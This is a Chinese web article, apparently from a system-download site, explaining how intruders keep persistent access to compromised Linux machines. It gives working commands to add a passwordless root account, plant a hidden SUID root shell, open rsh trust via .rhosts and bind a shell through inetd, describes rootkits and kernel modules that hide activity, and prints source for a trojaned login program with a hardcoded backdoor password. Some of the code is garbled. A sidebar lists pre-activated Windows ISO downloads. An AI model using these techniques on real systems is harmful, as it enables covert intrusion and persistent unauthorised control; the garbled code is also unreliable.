浅析Linux系统后门技术和实践方法
后门简介
入侵者完全控制系统后,为方便下次进入而采用的一种技术。
一般通过修改系统配置文件和安装第三方后门工具来实现。
具有隐蔽性,能绕开系统日志,不易被系管理员发现等特点。
常用后门技术
增加超级用户账号
破解/嗅探用户密码
放置SUID Shell
rhosts
利用系统服务程序
TCP/UDP/ICMP Shell
Crontab定时任务
共享库文件
工具包rootkit
可装载内核模块(LKM)
增加超级用户
# echo "e4gle:x:0:0::/:/bin/sh" >>
/etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >>
/etc/shadow
如果系统不允许uid=0的用户远程登录,
还需要增加一个普通用户账号。
破解/嗅探用户密码
获得shadow文件后,用John the Ripper
工具破解薄弱的用户密码。
安装sniffit等嗅探工具,监听telnet、ftp等
端口,收集用户密码。
放置SUID Shell
# cp /bin/bash /dev/.rootshell
# chmod u s /dev/.rootshell
普通用户在本机运行/dev/.rootshell,即
可获得一个root权限的shell。
rhosts
# echo " " >/.rhosts
# rsh -l root victim.com csh -i
远程可以得到一个rootshell。
利用系统服务程序
修改/etc/inetd.conf,
daytime stream tcp nowait /bin/sh sh -I
用trojan程序替换in.telnetd、in.rexecd等
inted的服务程序
重定向login程序
TCP/UDP/ICMP Shell
BindShell,大部分是基于TCP/UDP协议
的网络服务程序,在高端口监听,很容易
被发现。
Ping Backdoor,通过ICMP包激活后门,
形成一个Shell通道。
TCP ACK数据包后门,能够穿越防火
墙。
Crontab定时任务
通过Crontab程序调度已安装的后门程序
定时运行,一般在深夜时段,是系统管理
员不在线的时间。
共享库文件
在共享库中嵌入后门函数
使用后门口令激活Shell,获得权限
能够躲避系统管理员对二进制文件本身的
校验
工具包rootkit
包含一系列系统及后门工具:
清除日志中的登录记录
伪装校验和
替换netstat、ps等网络工具
后门登录程序
易于安装和使用
可装载内核模块(LKM)
LKM:Loadable Kernel Modules
动态的加载,不需要重新编译内核。
截获系统调用,具有隐藏目录、文件、进
程、网络连接等强大功能。
自身隐蔽性好,发现难度较大。
著名的LKM包有adore和knark。
后门的检测
以自己的经验,结合特定的工具,手工作
一些检测。
使用Tripwire或md5校验来检查系统。
借助IDS系统,监听到目标机器的可疑网
络连接。
实例:login后门
入侵者先把原始的/bin/login备份,再用一
段程序替换/bin/login。入侵者telnet登录
进来的时候,通过环境变量或者终端类型
传递了正确的后门密码,将直接获得一个
Shell;如果是普通用户登录,将会重定
向到原始的login文件,来处理正常的登
录。
最简单的login后门ulogin.c源代码如下:
实例:login后门
#include
#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins"
main (argc, argv, envp)
int argc;
charargv,envp;
{
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/csh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
1推荐系统
番茄花园 Windows 10 极速企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10番茄花园 Windows 10 32位极速企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
新萝卜家园电脑城专用系统 Windows10 x86 企业版 版本1507 2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新萝卜家园电脑城专用系统 Windows10 x86企业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows 10 32位企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(64位) 提供下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows10 64专业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动
雨林木风 Windows10 x64 企业装机版 版本1903 2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新雨林木风 Windows10 x64 企业装机版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
深度技术 Windows 10 x64 企业版 电脑城装机版 版本1903 2022年7月(64位) 高速下载
语言:中文版系统大小:3.98GB系统类型:Win10深度技术 Windows 10 x64 企业TLSB 电脑城装机版2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
电脑公司 装机专用系统Windows10 x64 企业版2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10电脑公司 装机专用系统 Windows10 x64 企业TLSB版2022年7月一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
新雨林木风 Windows10 x86 企业装机版2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.15GB系统类型:Win10新雨林木风 Windows10 x86 专业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活系统,无
相关文章
- Win 10系统如何打开自动搜索网络?打开自动搜索网络的方法
- Win10连接Wifi会弹出网络身份验证窗口怎么办
- 解决Win7本地连接"未识别网络"问题与协议不匹配有关
- win10如何重置网络连接名称或计数 win10重置网络连接名称或计数的方法
- FTP客户端目录遍历漏洞可向任意位置写文件
- 笔记本风扇不转了怎么办?
- 学会使用 MD5给GRUB密码加密
- CF不能全屏怎么办 Win7玩CF不能全屏的解决办法
- 爱普生Epson打印机驱动英文怎么改成中文?
- PJBlog个人博客系统Action.asp页面跨站脚本攻击漏洞
- Windows 2003下网络负载平衡(负载均衡/NLB)的配置详细图文教程
- 云火墙与云防火墙的区别是什么
- 如何禁止局域网传输电脑数据、如何禁止局域网泄露电脑数据
- Win10系统无线网络经常掉线问题的解决办法
热门系统
- 1华硕笔记本&台式机专用系统 GhostWin7 32位正式旗舰版2018年8月(32位)ISO镜像下载
- 2雨林木风 Ghost Win7 SP1 装机版 2020年4月(32位) 提供下载
- 3深度技术 Windows 10 x86 企业版 电脑城装机版2018年10月(32位) ISO镜像免费下载
- 4电脑公司 装机专用系统Windows10 x86喜迎国庆 企业版2020年10月(32位) ISO镜像快速下载
- 5深度技术 Windows 10 x86 企业版 六一节 电脑城装机版 版本1903 2022年6月(32位) ISO镜像免费下载
- 6深度技术 Windows 10 x64 企业版 电脑城装机版2021年1月(64位) 高速下载
- 7新萝卜家园电脑城专用系统 Windows10 x64 企业版2019年10月(64位) ISO镜像免费下载
- 8新萝卜家园 GhostWin7 SP1 最新电脑城极速装机版2018年8月(32位)ISO镜像下载
- 9电脑公司Ghost Win8.1 x32 精选纯净版2022年5月(免激活) ISO镜像高速下载
- 10新萝卜家园Ghost Win8.1 X32 最新纯净版2018年05(自动激活) ISO镜像免费下载
热门文章
- 1华为手环6pro有游泳功能吗-支持游泳模式吗
- 2重装上阵新赛季有哪些重型武器_重装上阵新赛季重型武器列表
- 3使用win7中本地搜索功能时四个技巧快速找到文件的操作方如何用win7的搜索功能法
- 4premiere怎么更改素材序列? premiere更改序列设置的方法
- 5天天酷跑布鲁与冰原狼仔哪一个好 布鲁好还是冰原狼仔好
- 6斐讯k1路由器刷Breed BootLoader(不死UBoot)教程
- 7路由器密码忘了怎么办 无线路由器登陆密码忘了解决方法【详解】
- 8战双帕弥什超频晶币极如何获得_战双帕弥什超频晶币极获得方法
- 9安全事件应急响应工具箱
- 10如何重装系统(安装系统)win7,本文教您如何迅速重装win7系统
常用系统
- 1深度技术Ghost Win8.1 x32位 特别纯净版2020年5月(免激活) ISO镜像高速下载
- 2深度技术 Ghost Win7 x64 Sp1 电脑城纯净版2022年2月(64位) ISO镜像高速下载
- 3番茄花园Ghost Win8.1 x64 办公纯净版2020年10月(激活版) ISO镜像高速下载
- 4电脑公司Ghost Win8.1 x32 精选纯净版2022年1月(免激活) ISO镜像高速下载
- 5深度技术Ghost Win8.1 x32位 特别纯净版2021年3月(免激活) ISO镜像高速下载
- 6雨林木风Ghost Win8.1 (X32) 快速纯净版2021年3月(免激活) ISO镜像快速下载
- 7电脑公司Ghost Win8.1 X64位 纯净版2021年11月(自动激活) ISO镜像快速下载
- 8深度技术Ghost Win7 Sp1 电脑城万能装机版2021年12月(32位) ISO高速下载
- 9雨林木风 Windows10 x64 企业装机版2020年9月(64位) ISO镜像高速下载
- 10电脑公司Ghost Win7 Sp1 元旦特别 装机万能版2022年1月(32位) 提供下载